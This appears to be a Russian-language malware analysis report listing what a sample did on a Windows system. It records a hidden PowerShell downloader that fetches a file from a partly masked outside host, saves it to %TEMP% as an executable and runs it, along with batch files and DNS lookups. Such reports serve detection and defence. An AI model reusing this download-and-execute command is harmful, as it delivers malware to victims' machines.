Техническая информация
- $nqlbltajt как %temp%\fioabbu.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Momzuaisoz1([String] $Nqlbltajt){(New-Object System.Net.WebClient).DownloadFile($Nqlbltajt,''%TEMP%\Fioabbu.exe'');Start-Process ''%TEMP%\Fioabbu.exe'';}tr...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1904
- %TEMP%\min-o_d.bat
- %TEMP%\1238523.cvr
- 'sw######mmars.vonmammen.org':80
- http://sw######mmars.vonmammen.org/ext/doronsond.png
- DNS ASK we###opnumij.nl
- DNS ASK sw######mmars.vonmammen.org
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Momzuaisoz1([String] $Nqlbltajt){(New-Object System.Net.WebClient).DownloadFile($Nqlbltajt,''%TEMP%\Fioabbu.exe'');Start-Process ''%TEMP%\Fioabbu.exe'';}tr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\min-o_d.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\min-o_d.bat" "